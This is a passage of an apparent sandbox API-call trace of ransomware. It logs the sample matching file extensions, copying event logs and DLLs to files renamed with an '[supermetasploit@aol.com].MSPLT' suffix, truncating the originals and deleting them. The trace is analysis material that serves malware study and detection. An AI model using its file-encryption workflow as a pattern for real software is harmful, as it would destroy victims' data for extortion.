Defender%4WHC.evtx") returned 52 [0295.265] lstrlenW (lpString=".dbf") returned 4 [0295.265] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0295.266] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Windows Defender%4WHC.evtx") returned 52 [0295.266] lstrlenW (lpString=".1cd") returned 4 [0295.266] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0295.266] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Windows Defender%4WHC.evtx") returned 52 [0295.266] lstrlenW (lpString=".jpg") returned 4 [0295.266] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0295.266] lstrcmpiW (lpString1=".evtx", lpString2=".MSPLT") returned -1 [0295.266] lstrlenW (lpString="Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx") returned 57 [0295.266] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx" (normalized: "c:\\logs\\microsoft-windows-wininet-config%4proxyconfigchanged.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x480 [0295.267] GetFileSizeEx (in: hFile=0x480, lpFileSize=0x371ff14 | out: lpFileSize=0x371ff14*=69632) returned 1 [0295.267] CloseHandle (hObject=0x480) returned 1 [0295.267] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx" (normalized: "c:\\logs\\microsoft-windows-wininet-config%4proxyconfigchanged.evtx")) returned 0x20 [0295.267] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\microsoft-windows-wininet-config%4proxyconfigchanged.evtx.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0295.267] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx" (normalized: "c:\\logs\\microsoft-windows-wininet-config%4proxyconfigchanged.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x480 [0295.267] SetFilePointerEx (in: hFile=0x480, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x371fec0 | out: lpNewFilePointer=0x0) returned 1 [0295.267] SetFilePointerEx (in: hFile=0x480, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x371fec0 | out: lpNewFilePointer=0x0) returned 1 [0295.267] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\microsoft-windows-wininet-config%4proxyconfigchanged.evtx.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x470 [0295.306] GetLastError () returned 0x0 [0295.306] ReadFile (in: hFile=0x480, lpBuffer=0x41d7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x371fecc, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesRead=0x371fecc*=0x11000, lpOverlapped=0x0) returned 1 [0295.311] WriteFile (in: hFile=0x470, lpBuffer=0x41d7020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x371fc94, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesWritten=0x371fc94*=0x11010, lpOverlapped=0x0) returned 1 [0295.315] ReadFile (in: hFile=0x480, lpBuffer=0x41d7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x371fecc, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesRead=0x371fecc*=0x0, lpOverlapped=0x0) returned 1 [0295.315] WriteFile (in: hFile=0x470, lpBuffer=0x41d7020*, nNumberOfBytesToWrite=0x146, lpNumberOfBytesWritten=0x371fc94, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesWritten=0x371fc94*=0x146, lpOverlapped=0x0) returned 1 [0295.316] SetEndOfFile (hFile=0x470) returned 1 [0295.316] CloseHandle (hObject=0x470) returned 1 [0295.650] SetFilePointerEx (in: hFile=0x480, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x371fec0 | out: lpNewFilePointer=0x0) returned 1 [0295.650] SetEndOfFile (hFile=0x480) returned 1 [0295.651] CloseHandle (hObject=0x480) returned 1 [0295.652] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0295.652] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx" (normalized: "c:\\logs\\microsoft-windows-wininet-config%4proxyconfigchanged.evtx")) returned 1 [0295.652] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx") returned 65 [0295.652] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx") returned 65 [0295.652] lstrlenW (lpString=".doc") returned 4 [0295.652] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0295.653] lstrlenW (lpString=".docx") returned 5 [0295.653] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0295.653] lstrlenW (lpString=".pdf") returned 4 [0295.653] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0295.653] lstrlenW (lpString=".xls") returned 4 [0295.653] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0295.653] lstrlenW (lpString=".xlsx") returned 5 [0295.653] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0295.653] lstrlenW (lpString=".ppt") returned 4 [0295.653] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0295.653] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx") returned 65 [0295.653] lstrlenW (lpString=".zip") returned 4 [0295.653] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0295.653] lstrlenW (lpString=".rar") returned 4 [0295.653] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0295.653] lstrlenW (lpString=".bz2") returned 4 [0295.653] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0295.653] lstrlenW (lpString=".7z") returned 3 [0295.653] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0295.653] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx") returned 65 [0295.653] lstrlenW (lpString=".dbf") returned 4 [0295.653] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0295.653] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx") returned 65 [0295.653] lstrlenW (lpString=".1cd") returned 4 [0295.653] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0295.653] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx") returned 65 [0295.653] lstrlenW (lpString=".jpg") returned 4 [0295.653] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0295.653] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx") returned 65 [0295.653] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx") returned 65 [0295.653] lstrlenW (lpString=".doc") returned 4 [0295.653] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0295.653] lstrlenW (lpString=".docx") returned 5 [0295.653] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0295.653] lstrlenW (lpString=".pdf") returned 4 [0295.654] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0295.654] lstrlenW (lpString=".xls") returned 4 [0295.654] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0295.654] lstrlenW (lpString=".xlsx") returned 5 [0295.654] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0295.654] lstrlenW (lpString=".ppt") returned 4 [0295.654] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0295.654] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx") returned 65 [0295.654] lstrlenW (lpString=".zip") returned 4 [0295.654] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0295.654] lstrlenW (lpString=".rar") returned 4 [0295.654] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0295.654] lstrlenW (lpString=".bz2") returned 4 [0295.654] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0295.654] lstrlenW (lpString=".7z") returned 3 [0295.654] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0295.654] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx") returned 65 [0295.654] lstrlenW (lpString=".dbf") returned 4 [0295.654] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0295.654] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx") returned 65 [0295.654] lstrlenW (lpString=".1cd") returned 4 [0295.654] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0295.654] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx") returned 65 [0295.654] lstrlenW (lpString=".jpg") returned 4 [0295.654] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0295.654] lstrcmpiW (lpString1=".evtx", lpString2=".MSPLT") returned -1 [0295.654] lstrlenW (lpString="Setup.evtx") returned 10 [0295.655] CreateFileW (lpFileName="C:\\Logs\\Setup.evtx" (normalized: "c:\\logs\\setup.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x480 [0295.655] GetFileSizeEx (in: hFile=0x480, lpFileSize=0x371ff14 | out: lpFileSize=0x371ff14*=69632) returned 1 [0295.655] CloseHandle (hObject=0x480) returned 1 [0295.655] GetFileAttributesW (lpFileName="C:\\Logs\\Setup.evtx" (normalized: "c:\\logs\\setup.evtx")) returned 0x20 [0295.655] GetFileAttributesW (lpFileName="C:\\Logs\\Setup.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\setup.evtx.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0295.655] CreateFileW (lpFileName="C:\\Logs\\Setup.evtx" (normalized: "c:\\logs\\setup.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x480 [0295.655] SetFilePointerEx (in: hFile=0x480, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x371fec0 | out: lpNewFilePointer=0x0) returned 1 [0295.655] SetFilePointerEx (in: hFile=0x480, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x371fec0 | out: lpNewFilePointer=0x0) returned 1 [0295.656] CreateFileW (lpFileName="C:\\Logs\\Setup.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\setup.evtx.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x470 [0295.656] GetLastError () returned 0x0 [0295.656] ReadFile (in: hFile=0x480, lpBuffer=0x41d7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x371fecc, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesRead=0x371fecc*=0x11000, lpOverlapped=0x0) returned 1 [0295.660] WriteFile (in: hFile=0x470, lpBuffer=0x41d7020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x371fc94, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesWritten=0x371fc94*=0x11010, lpOverlapped=0x0) returned 1 [0295.663] ReadFile (in: hFile=0x480, lpBuffer=0x41d7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x371fecc, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesRead=0x371fecc*=0x0, lpOverlapped=0x0) returned 1 [0295.663] WriteFile (in: hFile=0x470, lpBuffer=0x41d7020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0x371fc94, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesWritten=0x371fc94*=0xe8, lpOverlapped=0x0) returned 1 [0295.663] SetEndOfFile (hFile=0x470) returned 1 [0295.668] CloseHandle (hObject=0x470) returned 1 [0295.671] SetFilePointerEx (in: hFile=0x480, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x371fec0 | out: lpNewFilePointer=0x0) returned 1 [0295.671] SetEndOfFile (hFile=0x480) returned 1 [0295.673] CloseHandle (hObject=0x480) returned 1 [0295.673] SetFileAttributesW (lpFileName="C:\\Logs\\Setup.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0295.673] DeleteFileW (lpFileName="C:\\Logs\\Setup.evtx" (normalized: "c:\\logs\\setup.evtx")) returned 1 [0295.673] lstrlenW (lpString="C:\\Logs\\Setup.evtx") returned 18 [0295.673] lstrlenW (lpString="C:\\Logs\\Setup.evtx") returned 18 [0295.673] lstrlenW (lpString=".doc") returned 4 [0295.673] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0295.674] lstrlenW (lpString=".docx") returned 5 [0295.674] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0295.674] lstrlenW (lpString=".pdf") returned 4 [0295.674] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0295.674] lstrlenW (lpString=".xls") returned 4 [0295.674] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0295.674] lstrlenW (lpString=".xlsx") returned 5 [0295.674] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0295.674] lstrlenW (lpString=".ppt") returned 4 [0295.674] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0295.674] lstrlenW (lpString="C:\\Logs\\Setup.evtx") returned 18 [0295.674] lstrlenW (lpString=".zip") returned 4 [0295.674] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0295.674] lstrlenW (lpString=".rar") returned 4 [0295.674] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0295.674] lstrlenW (lpString=".bz2") returned 4 [0295.674] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0295.674] lstrlenW (lpString=".7z") returned 3 [0295.674] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0295.674] lstrlenW (lpString="C:\\Logs\\Setup.evtx") returned 18 [0295.674] lstrlenW (lpString=".dbf") returned 4 [0295.674] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0295.674] lstrlenW (lpString="C:\\Logs\\Setup.evtx") returned 18 [0295.674] lstrlenW (lpString=".1cd") returned 4 [0295.674] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0295.674] lstrlenW (lpString="C:\\Logs\\Setup.evtx") returned 18 [0295.674] lstrlenW (lpString=".jpg") returned 4 [0295.674] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0295.675] lstrlenW (lpString="C:\\Logs\\Setup.evtx") returned 18 [0295.675] lstrlenW (lpString="C:\\Logs\\Setup.evtx") returned 18 [0295.675] lstrlenW (lpString=".doc") returned 4 [0295.675] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0295.675] lstrlenW (lpString=".docx") returned 5 [0295.675] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0295.675] lstrlenW (lpString=".pdf") returned 4 [0295.675] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0295.675] lstrlenW (lpString=".xls") returned 4 [0295.675] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0295.675] lstrlenW (lpString=".xlsx") returned 5 [0295.675] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0295.675] lstrlenW (lpString=".ppt") returned 4 [0295.675] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0295.675] lstrlenW (lpString="C:\\Logs\\Setup.evtx") returned 18 [0295.675] lstrlenW (lpString=".zip") returned 4 [0295.675] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0295.675] lstrlenW (lpString=".rar") returned 4 [0295.675] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0295.675] lstrlenW (lpString=".bz2") returned 4 [0295.675] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0295.675] lstrlenW (lpString=".7z") returned 3 [0295.675] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0295.675] lstrlenW (lpString="C:\\Logs\\Setup.evtx") returned 18 [0295.675] lstrlenW (lpString=".dbf") returned 4 [0295.676] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0295.676] lstrlenW (lpString="C:\\Logs\\Setup.evtx") returned 18 [0295.676] lstrlenW (lpString=".1cd") returned 4 [0295.676] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0295.676] lstrlenW (lpString="C:\\Logs\\Setup.evtx") returned 18 [0295.676] lstrlenW (lpString=".jpg") returned 4 [0295.676] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0295.676] lstrcmpiW (lpString1=".evtx", lpString2=".MSPLT") returned -1 [0295.676] lstrlenW (lpString="System.evtx") returned 11 [0295.676] CreateFileW (lpFileName="C:\\Logs\\System.evtx" (normalized: "c:\\logs\\system.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x480 [0295.678] GetFileSizeEx (in: hFile=0x480, lpFileSize=0x371ff14 | out: lpFileSize=0x371ff14*=1118208) returned 1 [0295.678] CloseHandle (hObject=0x480) returned 1 [0295.678] GetFileAttributesW (lpFileName="C:\\Logs\\System.evtx" (normalized: "c:\\logs\\system.evtx")) returned 0x20 [0295.678] GetFileAttributesW (lpFileName="C:\\Logs\\System.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\system.evtx.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0295.678] CreateFileW (lpFileName="C:\\Logs\\System.evtx" (normalized: "c:\\logs\\system.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x480 [0295.678] SetFilePointerEx (in: hFile=0x480, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x371fec0 | out: lpNewFilePointer=0x0) returned 1 [0295.678] SetFilePointerEx (in: hFile=0x480, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x371fec0 | out: lpNewFilePointer=0x0) returned 1 [0295.678] CreateFileW (lpFileName="C:\\Logs\\System.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\system.evtx.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x470 [0295.680] GetLastError () returned 0x0 [0295.680] ReadFile (in: hFile=0x480, lpBuffer=0x41d7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x371fecc, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesRead=0x371fecc*=0xffff0, lpOverlapped=0x0) returned 1 [0296.098] WriteFile (in: hFile=0x470, lpBuffer=0x41d7020*, nNumberOfBytesToWrite=0xffff0, lpNumberOfBytesWritten=0x371fc94, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesWritten=0x371fc94*=0xffff0, lpOverlapped=0x0) returned 1 [0296.506] ReadFile (in: hFile=0x480, lpBuffer=0x41d7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x371fecc, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesRead=0x371fecc*=0x11010, lpOverlapped=0x0) returned 1 [0296.519] WriteFile (in: hFile=0x470, lpBuffer=0x41d7020*, nNumberOfBytesToWrite=0x11020, lpNumberOfBytesWritten=0x371fc94, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesWritten=0x371fc94*=0x11020, lpOverlapped=0x0) returned 1 [0296.526] ReadFile (in: hFile=0x480, lpBuffer=0x41d7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x371fecc, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesRead=0x371fecc*=0x0, lpOverlapped=0x0) returned 1 [0296.526] WriteFile (in: hFile=0x470, lpBuffer=0x41d7020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x371fc94, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesWritten=0x371fc94*=0xea, lpOverlapped=0x0) returned 1 [0296.526] SetEndOfFile (hFile=0x470) returned 1 [0296.526] CloseHandle (hObject=0x470) returned 1 [0296.806] SetFilePointerEx (in: hFile=0x480, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x371fec0 | out: lpNewFilePointer=0x0) returned 1 [0296.807] SetEndOfFile (hFile=0x480) returned 1 [0296.809] CloseHandle (hObject=0x480) returned 1 [0296.809] SetFileAttributesW (lpFileName="C:\\Logs\\System.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0296.809] DeleteFileW (lpFileName="C:\\Logs\\System.evtx" (normalized: "c:\\logs\\system.evtx")) returned 1 [0296.810] lstrlenW (lpString="C:\\Logs\\System.evtx") returned 19 [0296.810] lstrlenW (lpString="C:\\Logs\\System.evtx") returned 19 [0296.810] lstrlenW (lpString=".doc") returned 4 [0296.810] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0296.810] lstrlenW (lpString=".docx") returned 5 [0296.810] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0296.810] lstrlenW (lpString=".pdf") returned 4 [0296.810] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0296.810] lstrlenW (lpString=".xls") returned 4 [0296.810] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0296.810] lstrlenW (lpString=".xlsx") returned 5 [0296.810] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0296.810] lstrlenW (lpString=".ppt") returned 4 [0296.810] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0296.810] lstrlenW (lpString="C:\\Logs\\System.evtx") returned 19 [0296.810] lstrlenW (lpString=".zip") returned 4 [0296.810] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0296.810] lstrlenW (lpString=".rar") returned 4 [0296.810] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0296.810] lstrlenW (lpString=".bz2") returned 4 [0296.810] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0296.810] lstrlenW (lpString=".7z") returned 3 [0296.810] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0296.810] lstrlenW (lpString="C:\\Logs\\System.evtx") returned 19 [0296.810] lstrlenW (lpString=".dbf") returned 4 [0296.811] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0296.811] lstrlenW (lpString="C:\\Logs\\System.evtx") returned 19 [0296.811] lstrlenW (lpString=".1cd") returned 4 [0296.811] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0296.811] lstrlenW (lpString="C:\\Logs\\System.evtx") returned 19 [0296.811] lstrlenW (lpString=".jpg") returned 4 [0296.811] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0296.811] lstrlenW (lpString="C:\\Logs\\System.evtx") returned 19 [0296.811] lstrlenW (lpString="C:\\Logs\\System.evtx") returned 19 [0296.811] lstrlenW (lpString=".doc") returned 4 [0296.811] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0296.811] lstrlenW (lpString=".docx") returned 5 [0296.811] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0296.811] lstrlenW (lpString=".pdf") returned 4 [0296.811] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0296.811] lstrlenW (lpString=".xls") returned 4 [0296.811] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0296.811] lstrlenW (lpString=".xlsx") returned 5 [0296.811] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0296.811] lstrlenW (lpString=".ppt") returned 4 [0296.811] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0296.811] lstrlenW (lpString="C:\\Logs\\System.evtx") returned 19 [0296.811] lstrlenW (lpString=".zip") returned 4 [0296.811] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0296.811] lstrlenW (lpString=".rar") returned 4 [0296.811] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0296.812] lstrlenW (lpString=".bz2") returned 4 [0296.812] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0296.812] lstrlenW (lpString=".7z") returned 3 [0296.812] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0296.812] lstrlenW (lpString="C:\\Logs\\System.evtx") returned 19 [0296.812] lstrlenW (lpString=".dbf") returned 4 [0296.812] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0296.812] lstrlenW (lpString="C:\\Logs\\System.evtx") returned 19 [0296.812] lstrlenW (lpString=".1cd") returned 4 [0296.812] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0296.812] lstrlenW (lpString="C:\\Logs\\System.evtx") returned 19 [0296.812] lstrlenW (lpString=".jpg") returned 4 [0296.812] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0296.812] lstrcmpiW (lpString1=".dll", lpString2=".MSPLT") returned -1 [0296.812] lstrlenW (lpString="AppVIsvStreamingManager.dll") returned 27 [0296.812] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvStreamingManager.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvstreamingmanager.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x480 [0296.813] GetFileSizeEx (in: hFile=0x480, lpFileSize=0x371ff14 | out: lpFileSize=0x371ff14*=210648) returned 1 [0296.813] CloseHandle (hObject=0x480) returned 1 [0296.813] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvStreamingManager.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvstreamingmanager.dll")) returned 0x20 [0296.813] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvStreamingManager.dll.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvstreamingmanager.dll.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0296.813] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvStreamingManager.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvstreamingmanager.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0296.814] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvStreamingManager.dll") returned 85 [0296.814] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvStreamingManager.dll") returned 85 [0296.814] lstrlenW (lpString=".doc") returned 4 [0296.814] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0296.814] lstrlenW (lpString=".docx") returned 5 [0296.814] lstrcmpiW (lpString1=".docx", lpString2="r.dll") returned -1 [0296.814] lstrlenW (lpString=".pdf") returned 4 [0296.814] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0296.814] lstrlenW (lpString=".xls") returned 4 [0296.814] lstrcmpiW 